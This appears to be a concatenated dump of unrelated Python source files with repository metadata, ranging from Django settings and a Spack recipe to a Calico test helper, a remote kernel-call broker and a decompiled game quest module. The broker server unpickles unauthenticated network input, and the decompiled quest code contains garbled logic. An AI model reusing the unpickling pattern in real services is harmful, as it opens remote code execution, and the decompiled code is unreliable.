'Expires': 'Thu, Dec 31, 2099 20:00:00 GMT',
'CacheControl': 'max-age=86400',
}
# set environment variable in pod specs
STATIC_FILES_LOCAL = True if get_env_variable('STATIC_FILES_LOCAL') == '1' else False
if STATIC_FILES_LOCAL:
# hosting static files locally
STATICFILES_STORAGE = 'znbstatic.storage.VersionedStaticFilesStorage'
STATIC_URL = '/static/'
else:
# hosting static files on AWS S3
STATICFILES_STORAGE = 'znbstatic.storage.VersionedS3StaticFilesStorage'
AWS_STORAGE_STATIC_BUCKET_NAME = CONFIG['aws']['s3_static']['AWS_STORAGE_STATIC_BUCKET_NAME']
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_STATIC_BUCKET_NAME
ZNBSTATIC_VERSION = '0.4'
| 39.566667 | 97 | 0.764954 |
71d5db7fa53fedf2f33c35634362fb4d0dc54bd3 | 283 | py | Python | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 179 | 2019-12-04T14:54:53.000Z | 2022-03-30T09:08:38.000Z | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 62 | 2019-12-14T16:51:28.000Z | 2022-03-19T18:47:12.000Z | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 35 | 2019-12-08T13:19:53.000Z | 2022-03-25T10:33:02.000Z | # pylint: disable=redefined-outer-name,protected-access
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
class ComponentWithError:
def __init__(self):
raise NotImplementedError()
| 40.428571 | 94 | 0.777385 |
a29d7e71a93da2c4dc7a235c6820744c7884a9e2 | 1,907 | py | Python | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | 4 | 2018-12-20T20:41:38.000Z | 2020-03-07T17:27:53.000Z | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | null | null | null | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 29 12:02:20 2018
@author: Neil sharma
"""
from keras.preprocessing.image import img_to_array,load_img
#from sklearn.preprocessing import StandardScaler
import numpy as np
import os
from scipy.misc import imresize
#import argparse
image_store = []
#List of all Videos in the Source Directory.
#videos=os.listdir(video_source_path)
#Make a temp dir to store all the frames
#os.mkdir(video_source_path + '/frames')
ped1_path = r"D:\ML\Shrey Anomaly detection\Dataset\Crack\Data"
paths = os.listdir(ped1_path)
for path in paths:
framepath = ped1_path + "/" + path
"""for video in videos:
os.system( 'ffmpeg -i {}/{} -r 1/{} {}/frames/%03d.jpg'.format(video_source_path,video,fps,video_source_path))"""
images = os.listdir(framepath)
for image in images:
#image_path = framepath + "/" + image
image_path = framepath + "/" + image
img = load_img(image_path)
img = img_to_array(img)
#Resize the Image to (224,224,3) for the network to be able to process it.
img = imresize(img,(32,32,3))
#Convert the Image to Grayscale
g = 0.2989*img[:,:,0] + 0.5870*img[:,:,1] + 0.1140*img[:,:,2]
image_store.append(g)
#store(image_path)
image_store = np.array(image_store)
image_store.shape
a, b, c = image_store.shape
#Reshape to (227,227,batch_size)
image_store.resize(b,c,a)
#Normalize
image_store=(image_store-image_store.mean())/(image_store.std())
#Clip negative Values
image_store=np.clip(image_store,0,1)
#label = []
#label[0] = image_store[:, :, 343]
np.save('Crack.npy',image_store)
print("Saved file to disk") | 28.893939 | 122 | 0.592554 |
3aec69bb37ebfd77583d9e158a2db81039f89d45 | 5,348 | py | Python | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 6 | 2017-01-18T00:11:19.000Z | 2022-02-10T08:18:00.000Z | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 3 | 2017-05-11T13:54:42.000Z | 2020-08-12T06:15:43.000Z | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 4 | 2017-05-11T13:27:33.000Z | 2019-10-29T02:02:24.000Z | #!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
from uge.exceptions import InvalidRequest
try:
import UserList
except ImportError:
import collections as UserList
from .qconf_object import QconfObject
from uge.exceptions.invalid_argument import InvalidArgument
class QconfDictList(QconfObject, UserList.UserList):
""" This class encapsulates data and functionality common to all Qconf objects based on a list of dictionaries. """
FIRST_KEY = None
NAME_KEY = None
USER_PROVIDED_KEYS = []
REQUIRED_DATA_DEFAULTS = {}
KEY_VALUE_DELIMITER = '='
def __init__(self, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param data: Configuration data. If provided, it will override corresponding data from JSON string representation.
:type data: dict
:param metadata: Configuration metadata. If provided, it will override corresponding metadata from JSON string representation.
:type metadata: dict
:param json_string: Configuration JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not represent a list of dictionaries object.
"""
UserList.UserList.__init__(self)
QconfObject.__init__(self, data=data, metadata=metadata, json_string=json_string)
def check_input_data(self, data):
if type(data) != list:
raise InvalidArgument('Provided data is not a list: %s.' % str(data))
for d in data:
if type(d) != dict:
raise InvalidArgument('List member is not a dictionary: %s.' % str(d))
def update_with_required_data_defaults(self):
"""
Updates list objects with default values for required data keys.
:raises: **InvalidArgument** - in case object's data is not a list, or one of the list members is not a dictionary.
"""
if type(self.data) != list:
raise InvalidRequest('Data object is not a list: %s.' % str(self.data))
for d in self.data:
if type(d) != dict:
raise InvalidArgument('List member is not a dictionary: %s.' % str(d))
for (key, value) in list(self.get_required_data_defaults().items()):
if key not in d:
d[key] = value
def check_user_provided_keys(self):
"""
Checks for presence of all data keys that must be provided by user.
:raises: **InvalidRequest** - in case object's data is not a dictionary, or if any of the required keys are missing.
"""
for d in self.data:
if type(d) != dict:
raise InvalidRequest('List member is not a dictionary: %s.' % str(d))
for key in self.USER_PROVIDED_KEYS:
if not d.get(key):
raise InvalidRequest('Input data %s is missing required object key: %s.' % (str(d), str(key)))
def to_uge(self):
"""
Converts object to string acceptable as input for UGE qconf command.
:returns: Object's UGE-formatted string.
"""
lines = ''
for d in self.data:
for (key, value) in list(d.items()):
lines += '%s%s%s\n' % (key, self.KEY_VALUE_DELIMITER, self.py_to_uge(key, value))
return lines
def convert_data_to_uge_keywords(self, data):
for d in data:
for (key, value) in list(d.items()):
d[key] = self.py_to_uge(key, value)
def set_data_dict_list_from_qconf_output(self, qconf_output):
data = self.to_dict_list(qconf_output)
self.data = data
def to_dict_list(self, input_string):
lines = input_string.split('\n')
dict_list = []
object_data = {}
# Parse lines until first object key is found, and then
# create new dictionary object
for line in lines:
if not line:
continue
key_value = line.split(self.KEY_VALUE_DELIMITER)
key = key_value[0]
value = self.KEY_VALUE_DELIMITER.join(key_value[1:]).strip()
if key == self.FIRST_KEY:
object_data = {}
dict_list.append(object_data)
object_data[key] = self.uge_to_py(key, value)
return dict_list
#############################################################################
# Testing.
if __name__ == '__main__':
pass
| 38.47482 | 158 | 0.608826 |
0ce3cbf0db2e0a1fcb33a029f7ae581085246fc6 | 3,188 | py | Python | pykeval/pykeval/broker/remote_server.py | SilverTuxedo/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | 34 | 2021-09-17T16:17:58.000Z | 2022-03-11T06:23:21.000Z | pykeval/pykeval/broker/remote_server.py | fengjixuchui/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | null | null | null | pykeval/pykeval/broker/remote_server.py | fengjixuchui/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | 4 | 2021-09-17T19:39:29.000Z | 2022-03-10T07:06:43.000Z | import logging
import pickle
from socketserver import BaseRequestHandler, TCPServer
from pykeval.broker.local import LocalBroker
from pykeval.broker.requests import BrokerResponse, BrokerResponseType, BrokerRequest, BrokerRequestType
from pykeval.broker.messaging import receive, send
logger = logging.getLogger(__name__)
class BrokerRequestHandler(BaseRequestHandler):
broker_server = None
def handle(self) -> None:
logger.info(f"Got connection from {self.client_address}")
data = receive(self.request)
logger.debug("Received")
try:
request = pickle.loads(data)
# noinspection PyProtectedMember
response_data = self.__class__.broker_server._on_new_request(request)
response = BrokerResponse(BrokerResponseType.SUCCESS, response_data)
except Exception as e:
logger.exception("Error processing request")
response = BrokerResponse(BrokerResponseType.EXCEPTION, e)
logger.debug("Serializing and sending response")
serialized_response = pickle.dumps(response)
send(self.request, serialized_response)
logger.info(f"Sent response to {self.client_address}")
class RemoteBrokerServer:
"""
A broker server based on a local broker over TCP. This works together with `RemoteBroker` to allow running code on a
different machine than the client itself.
"""
def __init__(self, local_broker: LocalBroker, address: str, port: int):
"""
:param local_broker: The actual local broker that will handle requests
:param address: The address of the server
:param port: The port of the server
"""
self._local_broker = local_broker
self._address = address
self._port = port
def start(self):
"""
Starts the TCP server.
"""
handler_type = type("BoundBrokerRequestHandler", (BrokerRequestHandler,), {"broker_server": self})
with TCPServer((self._address, self._port), handler_type) as server:
logger.info(f"Starting server at {self._address}:{self._port}")
server.serve_forever()
def _on_new_request(self, request: BrokerRequest):
"""
Handles a broker request.
:return: What the local broker returned for the request
:raises ValueError if the request type is not supported.
"""
# No-data requests
if request.type == BrokerRequestType.GET_POINTER_SIZE:
return self._local_broker.get_pointer_size()
# Data requests
try:
handler = {
BrokerRequestType.CALL_FUNCTION: self._local_broker.call_function,
BrokerRequestType.READ_BYTES: self._local_broker.read_bytes,
BrokerRequestType.WRITE_BYTES: self._local_broker.write_bytes,
BrokerRequestType.ALLOCATE: self._local_broker.allocate,
BrokerRequestType.FREE: self._local_broker.free
}[request.type]
return handler(request.data)
except KeyError:
pass
raise ValueError(f"Unrecognized request type {request.type.value}")
| 35.820225 | 120 | 0.67064 |
b523160db88a32431886e9c2c04ede8ccb5f3f73 | 4,697 | py | Python | var/spack/repos/builtin/packages/cctools/package.py | hseara/spack | 4c9c5393f1fad00b7e8c77661a02b236db2d0e40 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/cctools/package.py | hseara/spack | 4c9c5393f1fad00b7e8c77661a02b236db2d0e40 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2021-05-12T06:06:20.000Z | 2022-03-30T23:10:14.000Z | var/spack/repos/builtin/packages/cctools/package.py | btovar/spack | f901c61e684a251c4396221517ff492a741dd946 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Cctools(AutotoolsPackage):
"""The Cooperative Computing Tools (cctools) enable large scale
distributed computations to harness hundreds to thousands of
machines from clusters, clouds, and grids.
"""
homepage = "https://cctools.readthedocs.io"
url = "https://ccl.cse.nd.edu/software/files/cctools-7.2.3-source.tar.gz"
version('7.2.3', sha256='c9d32f9e9d4886ef88b79cc7c898c26e8369a004132080697b8523560cb8765b')
version('7.2.2', sha256='3eee05826954792e3ef974fefe3b8e436f09cd368b195287639b67f5acfa050f')
version('7.2.1', sha256='8f847fef9bca1ebd23a93d74fc093807d2c3e584111c087cf25e070e130eb820')
version('7.1.7', sha256='63cbfabe52591d41a1b27040bf27700d2a11b2f30cb2e25132e0016fb1aade03')
version('7.1.5', sha256='c01415fd47a1d9626b6c556e0dc0a6b0d3cd67224fa060cabd44ff78eede1d8a')
version('7.1.3', sha256='b937878ab429dda31bc692e5d9ffb402b9eb44bb674c07a934bb769cee4165ba')
version('7.1.2', sha256='ca871e9fe245d047d4c701271cf2b868e6e3a170e8834c1887157ed855985131')
version('7.1.0', sha256='84748245db10ff26c0c0a7b9fd3ec20fbbb849dd4aadc5e8531fd1671abe7a81')
version('7.0.18', sha256='5b6f3c87ae68dd247534a5c073eb68cb1a60176a7f04d82699fbc05e649a91c2')
version('6.1.1', sha256='97f073350c970d6157f80891b3bf6d4f3eedb5f031fea386dc33e22f22b8af9d')
depends_on('openssl')
depends_on('perl+shared', type=('build', 'run'))
depends_on('python', type=('build', 'run'))
depends_on('readline')
depends_on('gettext') # Corrects python linking of -lintl flag.
depends_on('swig')
# depends_on('xrootd')
depends_on('zlib')
patch('arm.patch', when='target=aarch64:')
patch('cctools_7.0.18.python.patch', when='@7.0.18')
patch('cctools_6.1.1.python.patch', when='@6.1.1')
# Generally SYS_foo is defined to __NR_foo (sys/syscall.h) which
# is then defined to a syscall number (asm/unistd_64.h). Certain
# CentOS systems have SYS_memfd_create defined to
# __NR_memfd_create but are missing the second definition.
# This is a belt and suspenders solution to the problem.
def patch(self):
before = '#if defined(__linux__) && defined(SYS_memfd_create)'
after = '#if defined(__linux__) && defined(SYS_memfd_create) && defined(__NR_memfd_create)' # noqa: E501
f = 'dttools/src/memfdexe.c'
kwargs = {'ignore_absent': False, 'backup': True, 'string': True}
filter_file(before, after, f, **kwargs)
if self.spec.satisfies('%fj'):
makefiles = ['chirp/src/Makefile', 'grow/src/Makefile']
for m in makefiles:
filter_file('-fstack-protector-all', '', m)
def configure_args(self):
args = []
# make sure we do not pick a python outside spack:
if self.spec.satisfies('@6.1.1'):
if self.spec.satisfies('^python@3:'):
args.extend([
'--with-python3-path', self.spec['python'].prefix,
'--with-python-path', 'no'
])
elif self.spec.satisfies('^python@:2.9'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python3-path', 'no'
])
else:
args.extend([
'--with-python-path', 'no',
'--with-python3-path', 'no'
])
else:
# versions 7 and above, where --with-python-path recognized the
# python version:
if self.spec.satisfies('^python@3:'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python2-path', 'no'
])
elif self.spec.satisfies('^python@:2.9'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python3-path', 'no'
])
else:
args.extend([
'--with-python2-path', 'no',
'--with-python3-path', 'no'
])
# disable these bits
for p in ['mysql', 'xrootd']:
args.append('--with-{0}-path=no'.format(p))
# point these bits at the Spack installations
for p in ['openssl', 'perl', 'readline', 'swig', 'zlib']:
args.append('--with-{0}-path={1}'.format(p, self.spec[p].prefix))
return args
| 44.733333 | 113 | 0.609751 |
e5f974693e019a0bc8df44b85de3a978ca622281 | 745 | py | Python | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 5 | 2021-01-19T00:31:22.000Z | 2021-03-05T02:31:10.000Z | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 34 | 2021-01-14T21:00:18.000Z | 2021-03-11T17:57:26.000Z | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 43 | 2021-01-14T20:40:47.000Z | 2021-03-11T02:29:30.000Z | sad_playlist = ["SO DONE"]
print(sad_playlist)
sad_playlist.append("Reminds Me of You")
print(sad_playlist)
sad_playlist.sort(reverse=True)
print(sad_playlist)
sad_playlist.append("WITHOUT YOU")
print(sad_playlist)
sad_playlist.sort(reverse=False)
print(sad_playlist)
print("")
print("THIS IS JUST EXTRA (I WAS JUST BORED AND SURPRISED THAT THE TASK FOR THIS WEEK WAS THIS EASY). HEHE")
print("P.S. Kid Laroi was either the solo artist or featured on these tracks.")
print("")
print("Full Depressing Playlist: ")
print ("1. SO DONE")
print ("2. TRAGIC")
print("3. ALWAYS DO")
print("4. FEEL SOMETHING")
print("5. WITHOUT YOU")
print("6. GO")
print("7. Reminds Me of You")
print("8. WRONG")
print("")
print("These are only some.") | 18.170732 | 108 | 0.718121 |
ec6f3f05c10daed0201cea0a439f5926c4d9509b | 5,350 | py | Python | calico_test/tests/st/utils/workload.py | tomdee/calico-containers | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | null | null | null | calico_test/tests/st/utils/workload.py | tomdee/calico-containers | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | 3 | 2015-07-30T19:18:58.000Z | 2015-07-30T23:32:19.000Z | calico_test/tests/st/utils/workload.py | tomdee/calico-docker | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import logging
from netaddr import IPAddress
from utils import retry_until_success, debug_failures
from network import DockerNetwork
from exceptions import CommandExecError
NET_NONE = "none"
logger = logging.getLogger(__name__)
class Workload(object):
"""
A calico workload.
These are the end-users containers that will run application-level
software.
"""
def __init__(self, host, name, image="busybox", network="bridge"):
"""
Create the workload and detect its IPs.
:param host: The host container on which this workload is instantiated.
All commands executed by this container will be passed through the host
via docker exec.
:param name: The name given to the workload container. This name is
passed to docker and can be used inside docker commands.
:param image: The docker image to be used to instantiate this
container. busybox used by default because it is extremely small and
has ping.
:param network: The DockerNetwork to connect to. Set to None to use
default Docker networking.
"""
self.host = host
self.name = name
command = "docker run -tid --name %s --net %s %s" % (name,
network,
image)
host.execute(command)
self.ip = host.execute("docker inspect --format "
"'{{.NetworkSettings.Networks.%s.IPAddress}}' %s"
% (network, name))
def execute(self, command):
"""
Execute arbitrary commands on this workload.
"""
# Make sure we've been created in the context of a host. Done here
# instead of in __init__ as we can't exist in the host until we're
# created.
assert self in self.host.workloads
return self.host.execute("docker exec %s %s" % (self.name, command))
def _get_ping_function(self, ip):
"""
Return a function to ping the supplied IP address from this workload.
:param ip: The IPAddress to ping.
:return: A partial function that can be executed to perform the ping.
The function raises a CommandExecError exception if the ping fails,
or returns the output of the ping.
"""
# Default to "ping"
ping = "ping"
try:
version = IPAddress(ip).version
assert version in [4, 6]
if version == 6:
ping = "ping6"
except BaseException:
pass
args = [
ping,
"-c", "1", # Number of pings
"-W", "1", # Timeout for each ping
ip,
]
command = ' '.join(args)
ping = partial(self.execute, command)
return ping
@debug_failures
def assert_can_ping(self, ip, retries=0):
"""
Execute a ping from this workload to the ip. Assert than a workload
can ping an IP. Use retries to allow for convergence.
Use of this method assumes the network will be transitioning from a
state where the destination is currently unreachable.
:param ip: The IP address (str or IPAddress) to ping.
:param retries: The number of retries.
:return: None.
"""
try:
retry_until_success(self._get_ping_function(ip),
retries=retries,
ex_class=CommandExecError)
except CommandExecError:
raise AssertionError("%s cannot ping %s" % (self, ip))
@debug_failures
def assert_cant_ping(self, ip, retries=0):
"""
Execute a ping from this workload to the ip. Assert that the workload
cannot ping an IP. Use retries to allow for convergence.
Use of this method assumes the network will be transitioning from a
state where the destination is currently reachable.
:param ip: The IP address (str or IPAddress) to ping.
:param retries: The number of retries.
:return: None.
"""
ping = self._get_ping_function(ip)
def cant_ping():
try:
ping()
except CommandExecError:
pass
else:
raise _PingError()
try:
retry_until_success(cant_ping,
retries=retries,
ex_class=_PingError)
except _PingError:
raise AssertionError("%s can ping %s" % (self, ip))
def __str__(self):
return self.name
class _PingError(Exception):
pass
| 34.294872 | 79 | 0.595327 |
a604dbfc0c74a10c08797b6ddc3d87cd48baae7f | 1,378 | py | Python | pyupgrade/_plugins/c_element_tree.py | adamchainz/pyupgrade | ccf3a9192fca6d2883b1e67d785e0010243e30c3 | [
"MIT"
] | 1,615 | 2017-03-17T02:45:59.000Z | 2022-03-31T18:53:20.000Z | pyupgrade/_plugins/c_element_tree.py | jiayanali/pyupgrade | b6e103248fd97b04d2bea898b95d1d8776fece57 | [
"MIT"
] | 357 | 2017-03-13T00:32:34.000Z | 2022-03-25T14:51:19.000Z | pyupgrade/_plugins/c_element_tree.py | jiayanali/pyupgrade | b6e103248fd97b04d2bea898b95d1d8776fece57 | [
"MIT"
] | 130 | 2017-06-23T04:28:50.000Z | 2022-03-31T11:33:19.000Z | import ast
from typing import Iterable
from typing import List
from typing import Tuple
from tokenize_rt import Offset
from tokenize_rt import Token
from pyupgrade._ast_helpers import ast_to_offset
from pyupgrade._data import register
from pyupgrade._data import State
from pyupgrade._data import TokenFunc
from pyupgrade._token_helpers import find_token
def _replace_celementtree_with_elementtree(
i: int,
tokens: List[Token],
) -> None:
j = find_token(tokens, i, 'cElementTree')
tokens[j] = tokens[j]._replace(src='ElementTree')
@register(ast.ImportFrom)
def visit_ImportFrom(
state: State,
node: ast.ImportFrom,
parent: ast.AST,
) -> Iterable[Tuple[Offset, TokenFunc]]:
if (
state.settings.min_version >= (3,) and
node.module == 'xml.etree.cElementTree' and
node.level == 0
):
yield ast_to_offset(node), _replace_celementtree_with_elementtree
@register(ast.Import)
def visit_Import(
state: State,
node: ast.Import,
parent: ast.AST,
) -> Iterable[Tuple[Offset, TokenFunc]]:
if (
state.settings.min_version >= (3,) and
len(node.names) == 1 and
node.names[0].name == 'xml.etree.cElementTree' and
node.names[0].asname is not None
):
yield ast_to_offset(node), _replace_celementtree_with_elementtree
| 27.019608 | 73 | 0.682874 |
320a9f30027fd584051191ff0d788fe7fcb7b5ee | 24,751 | py | Python | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.quest.QuestPath
from pandac.PandaModules import TransformState
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import report
from pirates.pirate import AvatarType, AvatarTypes
from pirates.piratesbase import PiratesGlobals
from pirates.quest import QuestConstants
from pirates.piratesbase import TeamUtils
from pirates.world import LocationConstants
import types, copy
class QuestGoal:
__module__ = __name__
Type_Uid = 0
Type_Custom = 1
LEVEL_IDX = 0
TYPE_IDX = 1
FACTION_IDX = 2
HULL_IDX = 3
FLAGSHIP_IDX = 4
LOCATION_IDX = 5
MAX_IDX = 6
GOAL_TYPE_DINGHY = 'dinghy'
GOAL_TYPE_SHIP = 'ship'
GOAL_TYPES_OCEAN = [GOAL_TYPE_SHIP]
def __init__(self, typeInfo):
self.__goalDataStr = None
if typeInfo == None:
self.__goalType = types.ListType
self.__goalData = []
return
if type(typeInfo) == types.StringType:
typeInfo = [typeInfo]
self.__goalData = typeInfo
self.__goalType = type(self.__goalData)
return
def getType(self):
if self.__goalType == types.DictType:
return self.Type_Custom
return self.Type_Uid
def getTargetType(self):
if self.__goalType == types.DictType:
return self.__goalData.get(self.TYPE_IDX)
return (0, 0, 0, 0)
def getTargetTypeOnlyOnOcean(self):
return self.getTargetType() in self.GOAL_TYPES_OCEAN
def getLocation(self):
if self.__goalType == types.DictType:
return self.__goalData.get(self.LOCATION_IDX)
return
def compareTo(self, object, goalOwner=None):
if self.__goalType == types.DictType:
goalLevel = self.__goalData.get(self.LEVEL_IDX, 0)
if goalLevel > 0:
if goalLevel > object.getLevel():
return 1
hasIsShip = hasattr(object, '_isShip')
if game.process == 'ai':
if not hasIsShip:
return -1
goalLocation = self.__goalData.get(self.LOCATION_IDX, None)
objectLocation = object.getParentObj()
if goalLocation and objectLocation and hasattr(objectLocation, 'getUniqueId') and not goalLocation == LocationConstants.LocationIds.ANY_LOCATION and not LocationConstants.isInArea(goalLocation, objectLocation.getUniqueId())[0]:
return 1
goalFaction = hasIsShip and object._isShip() and self.getTargetTypeOnlyOnOcean() and self.__goalData.get(self.FACTION_IDX, None)
if goalFaction:
isEnemy = False
if goalOwner:
isEnemy = TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY
objFaction = object.getFaction()
if goalFaction != None and objFaction != None and goalFaction.getFaction() != objFaction.getFaction() or not isEnemy:
return 1
goalHull = self.__goalData.get(self.HULL_IDX, None)
if goalHull != None:
shipClassList = QuestConstants.getShipList(goalHull)
if shipClassList == None:
shipClassList = [
goalHull]
if object.shipClass not in shipClassList:
return 1
goalFlagship = self.__goalData.get(self.FLAGSHIP_IDX, False)
if goalFlagship != object.isFlagship:
return 1
if object.getTeam() == PiratesGlobals.PLAYER_TEAM:
return 1
return 0
elif self.getTargetTypeOnlyOnOcean() or self.__goalData.get(self.TYPE_IDX) == AvatarTypes.AnyAvatar:
if goalOwner:
if TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY:
return 0
elif object.getAvatarType().isA(self.__goalData.get(self.TYPE_IDX)):
return 0
else:
if self.__goalData and object.getUniqueId() in self.__goalData:
return 0
return 1
def getGoalIds(self, uidMgr=None, all=True):
if all:
results = [
(0, '')]
else:
results = ''
if self.__goalType == types.ListType:
if all:
uidData = self.__goalData
else:
uidData = self.__goalData[:1]
if uidMgr:
results = zip(map(lambda x: uidMgr.getDoId(x, None), uidData), uidData)
elif len(uidData) == 0:
results = ''
else:
results = uidData[0]
return results
def _asString(self):
if self.__goalDataStr != None:
return self.__goalDataStr
if self.__goalData == None:
resultStr = ''
if self.__goalType == types.ListType:
resultStr = str(self.__goalData)
else:
strRep = ''
for currField in range(self.MAX_IDX):
strRep += str(self.__goalData.get(currField, None))
strRep += '-'
resultStr = strRep
self.__goalDataStr = resultStr
return resultStr
def __repr__(self):
return self._asString()
def __str__(self):
return self._asString()
def __cmp__(self, other):
strRep = self._asString()
otherStrRep = other._asString()
if strRep < otherStrRep:
return -1
else:
if strRep > otherStrRep:
return 1
return 0
def __hash__(self):
result = hash(self._asString())
return result
class QuestStep:
__module__ = __name__
STNPC = 1
STItem = 2
STArea = 3
STTunnel = 4
STExteriorDoor = 5
STInteriorDoor = 6
STDinghy = 7
STShip = 8
STNPCArea = 9
STQuestNode = 10
STNPCEnemy = 11
STQuestProp = 12
NullStep = None
notify = DirectNotifyGlobal.directNotify.newCategory('QuestStep')
def __init__(self, originDoId, stepDoId, stepType, posH=(0, 0, 0, 0), islandUid='', targetAreaUid='', targetAvatarType=None, nodeSizes=(0, 0), nearOffset=(0, 0, 0), nearVis=(0, 0, 0)):
self.originDoId = originDoId
self.stepDoId = stepDoId
self.stepType = stepType
self.posH = posH
self.islandUid = islandUid
self.targetAreaUid = targetAreaUid
self.targetAvatarType = targetAvatarType
self.nodeSizes = nodeSizes
self.nearOffset = nearOffset
self.nearVis = nearVis
def __repr__(self):
return 'QuestStep(%d, %d, %d, %s, %s, %s, %s, %s, %s, %s)' % (self.getOriginDoId(), self.getStepDoId(), self.getStepType(), `(self.getPosH())`, self.getIsland(), self.getTargetArea(), self.targetAvatarType, self.nodeSizes, self.nearOffset, self.nearVis)
def __cmp__(self, other):
return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.posH, other.posH) or cmp(self.islandUid, other.islandUid) or cmp(self.targetAreaUid, other.targetAreaUid) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis)
def compareTarget(self, other):
try:
return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.islandId, other.islandId) or cmp(self.targetAreaId, other.targetAreaId) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis)
except:
self.notify.warning('error encountered when comparing queststeps %s and %s' % (self, other))
return 0
def getOriginDoId(self):
return self.originDoId
def getStepDoId(self):
return self.stepDoId
def getStepType(self):
return self.stepType
def getPosH(self):
return self.posH
def setIsland(self, islandUid=''):
self.islandUid = islandUid
def getIsland(self):
return self.islandUid
